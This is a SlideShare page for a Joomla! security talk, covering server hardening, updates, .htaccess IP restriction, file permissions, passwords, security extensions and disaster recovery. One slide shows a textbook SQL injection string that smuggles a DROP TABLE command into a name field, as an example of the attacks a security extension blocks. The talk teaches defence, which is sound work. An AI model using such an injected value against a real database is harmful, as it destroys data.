SlideShare uma empresa Scribd logo

Hidden Secrets For A Hack-Proof Joomla! Site

Daniel Kanchev
Daniel Kanchev

This presentation provides information about the most common Joomla! attacks and how to protect from them. The basics of securing Joomla! sites are covered in details.

Tecnologia
1 de 34
Baixar para ler offline
HIDDEN SECRETS FOR A HACK-PROOF JOOMLA! Daniel Kanchev @dvkanchev
BEFORE WE BEGIN … ✓ 7+ Years Of Joomla! Experience ✓ 6 Years With SiteGround ✓ Love Travelling The World ✓ Addicted To Extreme Sports
WHO SHOULD CARE ABOUT SECURITY ? ✓ Application/Extension Developers ✓ Hosting Providers/System Administrators ✓ YOU (End Joomla! Users)
EVERYONE WHO SHOULD CARE ABOUT SECURITY ? ✓Application/Extension Developers ✓Hosting Providers/System Administrators ✓YOU (End Joomla! Users)
WHY SHOULD YOU CARE ? ✓ Be Trustworthy By Protecting Your Clients’ Data ✓ Have A Healthy Site - Avoid Substantial Data Loss/Downtime
HOW HACKERS WORK?
EVERYONE’S RESPONSIBLE!
SECURITY IS A PROCESS! ! ! KEEP CALM IT’S NOT ROCKET SCIENCE
IS YOUR SERVER SETUP RIGHT?
SERVER CONFIG & TIPS ✓ Always Update Your Server Software ✓ Harden The Linux Kernel - grsecurity ✓ Chroot Processes ✓ Provide Only Restricted Shell Access ✓ Disable/Remove Unused Services SOLUTIONS: 1H Hive, Better Linux, CloudLinux
PROTECT YOUR WEB SERVER ✓ OWASP Rules - http://goo.gl/rC7Uz ✓ Atomic Rules - http://goo.gl/Fv3Vn ✓ Trustwave Paid Rules - http://goo.gl/9IAaB
PROTECT JOOMLA!
#1: UPDATE EVERYTHING!
SITEGROUND AUTO UPDATES
#2: DO THE BASICS ✓ Change The Default “admin” username ✓ Change The Default “jos_” DB Prefix ✓ Password Protect Your Administrator Folder
#3: RESTRICT THE ADMIN AREA BY IP ✓ Step 1: Check Your IP: whatismyip.com ✓ Add This Rule To Your .htaccess File deny from all allow from YOUR_IP_ADDRESS
#4: KEEP PHP SCRIPTS IN THE RIGHT FOLDERS <Files *.php> deny from all </Files>
#5: USE BULLET-PROOF PASSWORDS ✓ Avoid password generators ✓ Don’t use common words ✓ Avoid personal info, names and significant dates: daniel123
THE PERFECT PASSWORD ✓ Choose A Favourite (Not Famous) Movie Quote/Phrase From A Book: We all go a little mad sometimes ✓ Add Punctuation Symbols (?!.,:) And Capital Letters, Remove Whitespaces: We.all?go!AlittleMad2sometimes
#6: CHECK YOUR EXTENSIONS ✓Joomla! Vulnerable Extensions List (VEL): http://vel.joomla.org/ ✓National Vulnerability Database: http://web.nvd.nist.gov/view/vuln/search
#7: STAY ON TOP OF SECURITY UPDATES ✓http://feeds.joomla.org/JoomlaSecurityNews ✓http://feeds.joomla.org/ JoomlaSecurityVulnerableExtensions
BUILD A JOOMLA! SECURITY RSS FEED HOW TO DO IT: http://is.gd/Vze1Zo
#8: FIX YOUR PERMISSIONS AND OWNERSHIP ✓Folders: 0755 ✓Files: 0644 ✓All files/folders should be owned by your main FTP user ✓NEVER EVER USE 777 permissions
#9: ADDITIONAL PROTECTION THROUGH .htaccess FILE ✓ Remove PHP Sensitive Information ✓ Avoid Visual FingerPrinting ✓ Block Some Popular Tools Used By Hackers How To Do It: http://is.gd/pGfVXQ
#10: USE JOOMLA! SECURITY EXTENSIONS FOR IDS/IPS ✓jHackGuard ✓ Akeeba Admin Tools ✓ jomDefender ✓jSecure
SQL INJECTION SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
jHackGuard SETUP ✓ SQL Injections ✓ Remote URL/File Inclusions ✓ Remote Code Execution ✓ XSS Based Attacks
#11: BACKUP! BACKUP! BACKUP!
NOW WHAT?
DON’T PANIC!
DISASTER RECOVERY PLAN 1. Create A Copy Of The Hacked Site + All Logs 2. Restore From A Clean Backup 3. Quarantine Your Site - Maintenance Mode 4. Check The Logs For The Malicious Code 5. Resolve The Security Issues/Clean Malicious Code 6. Unquarantine Your Site
FEW THINGS TO TAKE AWAY ✓ Security Is About Making It Harder To Infiltrate - Not Making It Impossible ✓ Security Is An Ongoing Process ✓ Everyone Is Involved
QUESTIONS ?
THANK YOU! Daniel Kanchev @dvkanchev

Recomendados

How to Speed Up Your Joomla! Site
How to Speed Up Your Joomla! SiteHow to Speed Up Your Joomla! Site
How to Speed Up Your Joomla! SiteDaniel Kanchev
 
DrupalCon Barcelona 2015
DrupalCon Barcelona 2015DrupalCon Barcelona 2015
DrupalCon Barcelona 2015Daniel Kanchev
 
Speed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate PerformanceSpeed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate PerformanceJoomlaDay Australia
 
Squeeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla WebsiteSqueeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla WebsiteSiteGround.com
 
I Can Haz More Performanz?
I Can Haz More Performanz?I Can Haz More Performanz?
I Can Haz More Performanz?Andy Melichar
 
How to Speed Up Your Joomla Website
How to Speed Up Your Joomla WebsiteHow to Speed Up Your Joomla Website
How to Speed Up Your Joomla WebsiteSiteGround.com
 
WordCamp RVA 2011 - Performance & Tuning
WordCamp RVA 2011 - Performance & TuningWordCamp RVA 2011 - Performance & Tuning
WordCamp RVA 2011 - Performance & TuningTimothy Wood
 
HyperDB, MySQL Performance, & Flavors of MySQL
HyperDB, MySQL Performance, & Flavors of MySQLHyperDB, MySQL Performance, & Flavors of MySQL
HyperDB, MySQL Performance, & Flavors of MySQLEvan Volgas
 

Recomendados

How to Speed Up Your Joomla! Site
How to Speed Up Your Joomla! SiteHow to Speed Up Your Joomla! Site
How to Speed Up Your Joomla! SiteDaniel Kanchev
 
DrupalCon Barcelona 2015
DrupalCon Barcelona 2015DrupalCon Barcelona 2015
DrupalCon Barcelona 2015Daniel Kanchev
 
Speed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate PerformanceSpeed up Your Joomla Site for Ultimate Performance
Speed up Your Joomla Site for Ultimate PerformanceJoomlaDay Australia
 
Squeeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla WebsiteSqueeze Maximum Performance From Your Joomla Website
Squeeze Maximum Performance From Your Joomla WebsiteSiteGround.com
 
I Can Haz More Performanz?
I Can Haz More Performanz?I Can Haz More Performanz?
I Can Haz More Performanz?Andy Melichar
 
How to Speed Up Your Joomla Website
How to Speed Up Your Joomla WebsiteHow to Speed Up Your Joomla Website
How to Speed Up Your Joomla WebsiteSiteGround.com
 
WordCamp RVA 2011 - Performance & Tuning
WordCamp RVA 2011 - Performance & TuningWordCamp RVA 2011 - Performance & Tuning
WordCamp RVA 2011 - Performance & TuningTimothy Wood
 
HyperDB, MySQL Performance, & Flavors of MySQL
HyperDB, MySQL Performance, & Flavors of MySQLHyperDB, MySQL Performance, & Flavors of MySQL
HyperDB, MySQL Performance, & Flavors of MySQLEvan Volgas
 
SEMCON 2013 - WordPress Optimization
SEMCON 2013 - WordPress OptimizationSEMCON 2013 - WordPress Optimization
SEMCON 2013 - WordPress OptimizationMike Lopez
 
Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)
Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)
Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)Adam Dunford
 
High Performance WordPress
High Performance WordPressHigh Performance WordPress
High Performance WordPressvnsavage
 
10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...Otto Kekäläinen
 
The wp config.php
The wp config.phpThe wp config.php
The wp config.phpAnthony Montalbano
 
Caching 101
Caching 101Caching 101
Caching 101Andy Melichar
 
WordPress Plugins and Security
WordPress Plugins and SecurityWordPress Plugins and Security
WordPress Plugins and SecurityThink Media Inc.
 
"Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp...
"Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp..."Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp...
"Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp...Sudeep Balchhaudi
 
Mastering WordPress Vol.1
Mastering WordPress Vol.1Mastering WordPress Vol.1
Mastering WordPress Vol.1Wataru OKAMOTO
 
Between a Block & a Hard Place
Between a Block & a Hard PlaceBetween a Block & a Hard Place
Between a Block & a Hard PlaceWP Engine
 
Presentation on Instant page speed optimization
Presentation on Instant page speed optimizationPresentation on Instant page speed optimization
Presentation on Instant page speed optimizationSanjeev Kumar Jaiswal
 
EasyEngine - Command-Line tool to manage WordPress Sites on Nginx
EasyEngine - Command-Line tool to manage WordPress Sites on NginxEasyEngine - Command-Line tool to manage WordPress Sites on Nginx
EasyEngine - Command-Line tool to manage WordPress Sites on NginxrtCamp
 
21 Ways to Make WordPress Fast
21 Ways to Make WordPress Fast21 Ways to Make WordPress Fast
21 Ways to Make WordPress FastJason McCreary
 
The Power of a Video Library - WordCamp Raleigh
The Power of a Video Library - WordCamp RaleighThe Power of a Video Library - WordCamp Raleigh
The Power of a Video Library - WordCamp RaleighLauren Jeffcoat
 
Optimizing WordPress - WordPress SF Meetup April 2012
Optimizing WordPress - WordPress SF Meetup April 2012Optimizing WordPress - WordPress SF Meetup April 2012
Optimizing WordPress - WordPress SF Meetup April 2012Ben Metcalfe
 
Write your first WordPress plugin
Write your first WordPress pluginWrite your first WordPress plugin
Write your first WordPress pluginAnthony Montalbano
 
A crash course in scaling wordpress
A crash course in scaling wordpress A crash course in scaling wordpress
A crash course in scaling wordpress GovLoop
 
WordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressWordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressandrewnacin
 
WordPress Performance optimization
WordPress Performance optimizationWordPress Performance optimization
WordPress Performance optimizationBrecht Ryckaert
 
WordCamp Finland 2015 - WordPress Security
WordCamp Finland 2015 - WordPress SecurityWordCamp Finland 2015 - WordPress Security
WordCamp Finland 2015 - WordPress SecurityTiia Rantanen
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutSiteGround.com
 
Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Brad Williams
 

Mais conteúdo relacionado

Mais procurados

SEMCON 2013 - WordPress Optimization
SEMCON 2013 - WordPress OptimizationSEMCON 2013 - WordPress Optimization
SEMCON 2013 - WordPress OptimizationMike Lopez
 
Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)
Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)
Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)Adam Dunford
 
High Performance WordPress
High Performance WordPressHigh Performance WordPress
High Performance WordPressvnsavage
 
10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...Otto Kekäläinen
 
WordPress Plugins and Security
WordPress Plugins and SecurityWordPress Plugins and Security
WordPress Plugins and SecurityThink Media Inc.
 
"Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp...
"Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp..."Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp...
"Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp...Sudeep Balchhaudi
 
Mastering WordPress Vol.1
Mastering WordPress Vol.1Mastering WordPress Vol.1
Mastering WordPress Vol.1Wataru OKAMOTO
 
Between a Block & a Hard Place
Between a Block & a Hard PlaceBetween a Block & a Hard Place
Between a Block & a Hard PlaceWP Engine
 
Presentation on Instant page speed optimization
Presentation on Instant page speed optimizationPresentation on Instant page speed optimization
Presentation on Instant page speed optimizationSanjeev Kumar Jaiswal
 
EasyEngine - Command-Line tool to manage WordPress Sites on Nginx
EasyEngine - Command-Line tool to manage WordPress Sites on NginxEasyEngine - Command-Line tool to manage WordPress Sites on Nginx
EasyEngine - Command-Line tool to manage WordPress Sites on NginxrtCamp
 
21 Ways to Make WordPress Fast
21 Ways to Make WordPress Fast21 Ways to Make WordPress Fast
21 Ways to Make WordPress FastJason McCreary
 
The Power of a Video Library - WordCamp Raleigh
The Power of a Video Library - WordCamp RaleighThe Power of a Video Library - WordCamp Raleigh
The Power of a Video Library - WordCamp RaleighLauren Jeffcoat
 
Optimizing WordPress - WordPress SF Meetup April 2012
Optimizing WordPress - WordPress SF Meetup April 2012Optimizing WordPress - WordPress SF Meetup April 2012
Optimizing WordPress - WordPress SF Meetup April 2012Ben Metcalfe
 
Write your first WordPress plugin
Write your first WordPress pluginWrite your first WordPress plugin
Write your first WordPress pluginAnthony Montalbano
 
A crash course in scaling wordpress
A crash course in scaling wordpress A crash course in scaling wordpress
A crash course in scaling wordpress GovLoop
 
WordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressWordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressandrewnacin
 
WordPress Performance optimization
WordPress Performance optimizationWordPress Performance optimization
WordPress Performance optimizationBrecht Ryckaert
 
WordCamp Finland 2015 - WordPress Security
WordCamp Finland 2015 - WordPress SecurityWordCamp Finland 2015 - WordPress Security
WordCamp Finland 2015 - WordPress SecurityTiia Rantanen
 

Mais procurados (20)

SEMCON 2013 - WordPress Optimization
SEMCON 2013 - WordPress OptimizationSEMCON 2013 - WordPress Optimization
SEMCON 2013 - WordPress Optimization
 
Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)
Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)
Does This Theme Make My Website Look Fat? (Wordcamp SLC 2013)
 
High Performance WordPress
High Performance WordPressHigh Performance WordPress
High Performance WordPress
 
10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...
 
The wp config.php
The wp config.phpThe wp config.php
The wp config.php
 
Caching 101
Caching 101Caching 101
Caching 101
 
WordPress Plugins and Security
WordPress Plugins and SecurityWordPress Plugins and Security
WordPress Plugins and Security
 
"Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp...
"Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp..."Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp...
"Ensuring chances of theme acceptance in wordpress.org directory" on WordCamp...
 
Mastering WordPress Vol.1
Mastering WordPress Vol.1Mastering WordPress Vol.1
Mastering WordPress Vol.1
 
Between a Block & a Hard Place
Between a Block & a Hard PlaceBetween a Block & a Hard Place
Between a Block & a Hard Place
 
Presentation on Instant page speed optimization
Presentation on Instant page speed optimizationPresentation on Instant page speed optimization
Presentation on Instant page speed optimization
 
EasyEngine - Command-Line tool to manage WordPress Sites on Nginx
EasyEngine - Command-Line tool to manage WordPress Sites on NginxEasyEngine - Command-Line tool to manage WordPress Sites on Nginx
EasyEngine - Command-Line tool to manage WordPress Sites on Nginx
 
21 Ways to Make WordPress Fast
21 Ways to Make WordPress Fast21 Ways to Make WordPress Fast
21 Ways to Make WordPress Fast
 
The Power of a Video Library - WordCamp Raleigh
The Power of a Video Library - WordCamp RaleighThe Power of a Video Library - WordCamp Raleigh
The Power of a Video Library - WordCamp Raleigh
 
Optimizing WordPress - WordPress SF Meetup April 2012
Optimizing WordPress - WordPress SF Meetup April 2012Optimizing WordPress - WordPress SF Meetup April 2012
Optimizing WordPress - WordPress SF Meetup April 2012
 
Write your first WordPress plugin
Write your first WordPress pluginWrite your first WordPress plugin
Write your first WordPress plugin
 
A crash course in scaling wordpress
A crash course in scaling wordpress A crash course in scaling wordpress
A crash course in scaling wordpress
 
WordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressWordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPress
 
WordPress Performance optimization
WordPress Performance optimizationWordPress Performance optimization
WordPress Performance optimization
 
WordCamp Finland 2015 - WordPress Security
WordCamp Finland 2015 - WordPress SecurityWordCamp Finland 2015 - WordPress Security
WordCamp Finland 2015 - WordPress Security
 

Semelhante a Hidden Secrets For A Hack-Proof Joomla! Site

Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutSiteGround.com
 
Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Brad Williams
 
Secrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla RevealedSecrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla RevealedSiteGround.com
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User SecurityDre Armeda
 
8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress website8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress websiteSiteGround.com
 
Securing WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanSecuring WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanJeff Hoffman
 
Security misconfiguration
Security misconfigurationSecurity misconfiguration
Security misconfigurationJiri Danihelka
 
Defensive programing 101
Defensive programing 101Defensive programing 101
Defensive programing 101Niall Merrigan
 
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Bastian Grimm
 
5 Bare Minimum Things A Web Startup CTO Must Worry About
5 Bare Minimum Things A Web Startup CTO Must Worry About5 Bare Minimum Things A Web Startup CTO Must Worry About
5 Bare Minimum Things A Web Startup CTO Must Worry AboutIndus Khaitan
 
Orlando DNN Usergroup Pres 12/06/11
Orlando DNN Usergroup Pres 12/06/11Orlando DNN Usergroup Pres 12/06/11
Orlando DNN Usergroup Pres 12/06/11Jess Coburn
 
Keeping Your Joomla! Site Secure
Keeping Your Joomla! Site SecureKeeping Your Joomla! Site Secure
Keeping Your Joomla! Site Securejoomladayhouston
 
Making Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking itMaking Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking itTim Plummer
 
WordPress Security 101: Essential Security Practices Simplified
WordPress Security 101: Essential Security Practices SimplifiedWordPress Security 101: Essential Security Practices Simplified
WordPress Security 101: Essential Security Practices SimplifiedBlogVault Inc
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 

Semelhante a Hidden Secrets For A Hack-Proof Joomla! Site (20)

Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside Out
 
Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012
 
Secrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla RevealedSecrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla Revealed
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 
Securing Windows web servers
Securing Windows web serversSecuring Windows web servers
Securing Windows web servers
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User Security
 
8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress website8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress website
 
Securing WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanSecuring WordPress by Jeff Hoffman
Securing WordPress by Jeff Hoffman
 
Security misconfiguration
Security misconfigurationSecurity misconfiguration
Security misconfiguration
 
Defensive programing 101
Defensive programing 101Defensive programing 101
Defensive programing 101
 
WordPress Security
WordPress Security WordPress Security
WordPress Security
 
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
 
Flipping the script
Flipping the scriptFlipping the script
Flipping the script
 
Mechsoft products services
Mechsoft products servicesMechsoft products services
Mechsoft products services
 
5 Bare Minimum Things A Web Startup CTO Must Worry About
5 Bare Minimum Things A Web Startup CTO Must Worry About5 Bare Minimum Things A Web Startup CTO Must Worry About
5 Bare Minimum Things A Web Startup CTO Must Worry About
 
Orlando DNN Usergroup Pres 12/06/11
Orlando DNN Usergroup Pres 12/06/11Orlando DNN Usergroup Pres 12/06/11
Orlando DNN Usergroup Pres 12/06/11
 
Keeping Your Joomla! Site Secure
Keeping Your Joomla! Site SecureKeeping Your Joomla! Site Secure
Keeping Your Joomla! Site Secure
 
Making Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking itMaking Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking it
 
WordPress Security 101: Essential Security Practices Simplified
WordPress Security 101: Essential Security Practices SimplifiedWordPress Security 101: Essential Security Practices Simplified
WordPress Security 101: Essential Security Practices Simplified
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 

Mais de Daniel Kanchev

More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...Daniel Kanchev
 
Enterprise Drupal Application & Hosting Infrastructure Level Monitoring
Enterprise Drupal Application & Hosting Infrastructure Level MonitoringEnterprise Drupal Application & Hosting Infrastructure Level Monitoring
Enterprise Drupal Application & Hosting Infrastructure Level MonitoringDaniel Kanchev
 
Challenges Building The New Joomla! Demo & Free Hosting Platform
Challenges Building The New Joomla! Demo & Free Hosting PlatformChallenges Building The New Joomla! Demo & Free Hosting Platform
Challenges Building The New Joomla! Demo & Free Hosting PlatformDaniel Kanchev
 
Are you ready to be hacked?
Are you ready to be hacked?Are you ready to be hacked?
Are you ready to be hacked?Daniel Kanchev
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid ThemDaniel Kanchev
 
Sofia WP User Group Presentation
Sofia WP User Group PresentationSofia WP User Group Presentation
Sofia WP User Group PresentationDaniel Kanchev
 
WordPress website optimization
WordPress website optimizationWordPress website optimization
WordPress website optimizationDaniel Kanchev
 

Mais de Daniel Kanchev (9)

More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...
 
Drupal8 + AngularJS
Drupal8 + AngularJSDrupal8 + AngularJS
Drupal8 + AngularJS
 
Enterprise Drupal Application & Hosting Infrastructure Level Monitoring
Enterprise Drupal Application & Hosting Infrastructure Level MonitoringEnterprise Drupal Application & Hosting Infrastructure Level Monitoring
Enterprise Drupal Application & Hosting Infrastructure Level Monitoring
 
Challenges Building The New Joomla! Demo & Free Hosting Platform
Challenges Building The New Joomla! Demo & Free Hosting PlatformChallenges Building The New Joomla! Demo & Free Hosting Platform
Challenges Building The New Joomla! Demo & Free Hosting Platform
 
WP migrations
WP migrationsWP migrations
WP migrations
 
Are you ready to be hacked?
Are you ready to be hacked?Are you ready to be hacked?
Are you ready to be hacked?
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them
 
Sofia WP User Group Presentation
Sofia WP User Group PresentationSofia WP User Group Presentation
Sofia WP User Group Presentation
 
WordPress website optimization
WordPress website optimizationWordPress website optimization
WordPress website optimization
 

Último

Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...apidays
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 

Último (20)

Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Boost Fertility New Invention Ups Success Rates.pdf
